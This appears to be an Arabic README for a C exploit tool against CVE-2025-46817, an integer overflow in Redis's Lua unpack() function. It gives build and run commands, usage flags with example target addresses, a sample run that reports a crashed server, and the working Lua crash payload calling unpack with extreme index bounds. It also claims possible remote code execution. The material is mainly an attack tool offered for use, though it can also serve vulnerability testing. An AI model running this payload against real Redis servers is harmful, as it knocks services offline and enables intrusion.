
استغلال مبني على لغة C لثغرة CVE-2025-46817، وهي ثغرة تجاوز عدد صحيح في Redis، تتيح اكتشاف الانهيار وإمكانية تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر حمولة Lua unpack().
تنفيذ خفيف بلغة C لاستغلال CVE-2025-46817 لثغرة تجاوز عدد صحيح في Redis.
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
sudo yum install gcc hiredis-devel
brew install hiredis
gcc -o exploit exploit.c -lhiredis
./exploit -H 127.0.0.1 -P 6379
./exploit -H 192.168.1.100 -P 6379 -t 5
-H <host> مضيف خادم Redis (مطلوب)
-P <port> منفذ خادم Redis (مطلوب)
-t <timeout> مهلة الاتصال بالثواني (الافتراضي: 10)
-h عرض رسالة المساعدة
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
أداة استغلال CVE-2025-46817
تجاوز عدد صحيح -> سلسلة RCE
الوصول -> https://pwnbuffer.org/
المؤلف: Slayerkkk
الهدف: Redis <= 8.2.1
النوع: تلف الذاكرة -> تنفيذ الكود
ℹ️ اختبار الاتصال بـ 127.0.0.1:6379...
✅ الاتصال ناجح
ℹ️ إصدار Redis: 8.2.1
❌ عرضة للخطر - الإصدار <= 8.2.1
ℹ️ اختبار سكربتات Lua...
✅ Lua مفعل (1+1=2)
🚀 بدء الاستغلال
==================================================
💀 تنفيذ حمولة الاستغلال...
الحمولة: تجاوز عدد صحيح عبر unpack()
💥 انهيار الخادم - فقدان الاتصال!
📊 نتيجة الاستغلال
==============================
💥 الحالة: انهار (2.34s)
💀 نجاح الاستغلال - انهار الخادم!
تم تأكيد ثغرة CVE-2025-46817
يستهدف الاستغلال تجاوز عدد صحيح في تنفيذ دالة unpack() الخاصة بـ Lua في Redis (luaB_unpack). عند استدعائها بمعاملات محددة، يفيض الحساب الحسابي للأعداد الصحيحة الموقعة، مما يدفع Redis لمحاولة إنشاء عدد هائل من قيم الإرجاع.
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
تبلغ الأداة عن إحدى هذه الحالات:
المؤلف: Slayerkkk
الموقع: https://pwnbuffer.org